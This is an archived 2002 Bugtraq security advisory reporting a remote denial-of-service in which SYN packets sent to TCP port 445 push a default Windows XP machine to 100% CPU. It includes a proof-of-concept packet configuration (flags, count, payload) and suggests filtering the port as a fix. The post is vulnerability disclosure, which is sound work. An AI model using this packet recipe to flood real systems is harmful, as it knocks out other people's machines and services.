Home page logo
/

bugtraq logo Bugtraq mailing list archives

Windows XP Remote DOS attacks with SYN Flag. Make CPU 100 %
From: "Adonis.No.Spam" <adonis1 () videotron ca>
Date: Fri, 15 Feb 2002 11:22:30 -0500

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                           .---------------.
                          / NtWaK0 Advisory \
+-----------------------------------------------------------------------.
                                                                        :
Affected         : Windows XP default install with TCP 445 open         :
Type             : Remote DOS attacks with SYN Flag. Make CPU 100 %     :
Date             : 15-02-2002                                           :
Author           : NtWaK0 @ www.SafeHack.com                            :
+-----------------------------------------------------------------------.
                                                                        :
+----------------.
 Remote/Local DOS \
+------------------`----------------------------------------------------.
                                                                        :
+-----------.                                                           :
 Disclaimer  \                                                          :
+-------------`---------------------------------------------------------.
The information in this advisory is believed to be true based on        :
experiments though it may be false. The opinions expressed in this      :
advisory and program are my own and NOT of any company.                 :
In Fact I do not work for no one at the present time.                   :
                                                                        :
This material is presented for informational and entertainment purposes :
only, and to satisfy the curious. Any activities described in this file :
which involve vandalism, theft, or any other illegal activities are     :
recounted from third-party conversations. I do not condone or encourage :
vandalism or theft. I do not accept any liability for anything anyone   :
does with this information. So, don't shoot the messenger.              :
Remember: Use a computer in ways that ensure respect for your fellows.  :
                                                                        :
+-------.                                                               :
 T.O.C.  \                                                              :
+---------`-------------------------------------------------------------.
                                                                        :
                                                                        :
   [  Brief History . . . . . . . . . . . . . . . . . . . . . .line 45 ]:
                                                                        :
   [  The Problem . . . . . . . . . . . . . . . . . . . . . . .line 58 ]:
                                                                        :
   [  The Solution . . . . . . . . . . . . . . . . . . . . . .line 130 ]:
                                                                        :
+-------------.                                                         :
 Brief History \                                                        :
+---------------`-------------------------------------------------------.
TCP/UPD port 445 is open by default on a Fresh installed XP box.        :
The attack is seriouse since it work remotly and can make the CPU 100 % :
in less then 20 Second.                                                 :
To learn more about Windows XP please visit:                            :
http://www.microsoft.com                                                :
                                                                        :
YES YOUR HAVE GUESSED IT ENGLISH IS NOT MY MOTHER LANGUAGE -:)          :
+---------------------------+                                           :
Test OS Applications <<<                                           :
+---------------------------+                                           :
Tested on Windows XP                                                    :
Default Install with default ports                                      :
                                                                        :
+-----------.                                                           :
 The Problem \                                                          :
+-------------`---------------------------------------------------------.
If an attacker target your Windows XP port 445 TCP with some special    :
crafted packed [SYN Flag Set] they can cause 100 CPU % utilisation in   :
less then 20 Second. The speed while sending the packet was 20 K upload :
sometime less then 18 K [Based on DU-Meter]                             :
                                                                        :
I have tried some other default port with a similar attack but the CPU  :
utilistation was normal 9 % or 5 %.                                     :
                                                                        :
The target machine is a windows XP with 240 RAM.                        :
                                                                        :
I tried to send packets with other then SYN flag nothing happend. CPU OK:
When I sent about 3000 packets NOT IN ONE SHOT... I was sending the     :
packets one after the other, I noticed that CPU utilisation jumped 100% :
                                                                        :
I could not do any TASK on the XP machine till I stoped sending packets.:
                                                                        :
I can see this as a seriouse problem if you are using windows XP default:
                                                                        :
Imagine someone is attacking your Windows XP from 1000 zombies. I am    :
not sure if your Windows XP wont Crash.                                 :
                                                                        :
Like I said I send couples of packets and the CPU jumped in less then   :
20 Sec to 100 %. Soon I am going to do more tests to see what will      :
happen if I send the same packets but for one hour time or more.        :
                                                                        :
                                                                        :
+-----------------------------------------+                             :
Proof-Of-Concept-Packet-Information <<<                             :
+-----------------------------------------+                             :
[IP]                                                                    :
SourceAddress=                                                          :
SourcePort=1                                                            :
DestinationAddress=                                                     :
DestinationPort=445                                                     :
HeaderSize=20                                                           :
SpecifyHeaderSize=0                                                     :
Identification=0                                                        :
SpecifyIdentification=0                                                 :
Checksum=0                                                              :
SpecifyChecksum=0                                                       :
TypeService=4                                                           :
FragmentationType=2                                                     :
DataSize=32                                                             :
Offset=0                                                                :
TTL=1                                                                   :
                                                                        :
[Commands]                                                              :
NbPackets=3000                                                          :
PacketType=0                                                            :
                                                                        :
[TCP]                                                                   :
fURG=0                                                                  :
fACK=0                                                                  :
fPUSH=0                                                                 :
fRESET=0                                                                :
fSYN=1                                                                  :
fFIN=0                                                                  :
Acknowledge=0                                                           :
Sequence=0                                                              :
Window=0                                                                :
Offset=0                                                                :
Urgent=0                                                                :
Checksum=0                                                              :
SpecifyTCPChecksum=0                                                    :
Data=xffxffxffxffxffxffxffxffxffffx00                                   :
                                                                        :
........................................................................:
........................................................................:
                                                                        :
+------------.                                                          :
 The Solution \                                                         :
+--------------`--------------------------------------------------------.
Vendor should be informed...I guess Microsoft read Securityfocus too    :
Filter 445 and other UNUSED ports. Stop Unused Services                 :
+-----------------------------------------------------------------------.

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1

iQA/AwUBPG00kPPoW9fFNsN8EQIMcwCg4aNhkGYMIEDs4u+l3MCo5BMZKrcAn17B
fd1j/WRgYSqj/B4AkiohkXNz
=jwkR
-----END PGP SIGNATURE-----

________________________________________________________________________
The only secure computer is one that's unplugged, locked in a safe,
and buried 20 feet under the ground in a secret location... and i'm
not even too sure about that one"--Dennis Huges, FBI.
____________________________________________________________.___________
Live Well Do Good  www.SafeHack.com                         |
Je Pense, Donc Je Suis                                    \(|)/
I know I ain't perfect, but i'm 99 point 9 percent :)    --(")--
RFCs are meant to be read and followedÂ…:)                  /`\  NtWaK0
________________________________________________________________________
Connect yourself to the main computer and let me take you to a
cybernetic ride. Are you connected to the right cybernet? If you are,
finally you are connected to my brain.
________________________________________________________________________
-=- Use a computer in a ways that ensure respect for your fellow     -=-


  By Date           By Thread  

Current thread:
  • Windows XP Remote DOS attacks with SYN Flag. Make CPU 100 % Adonis.No.Spam (Feb 19)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]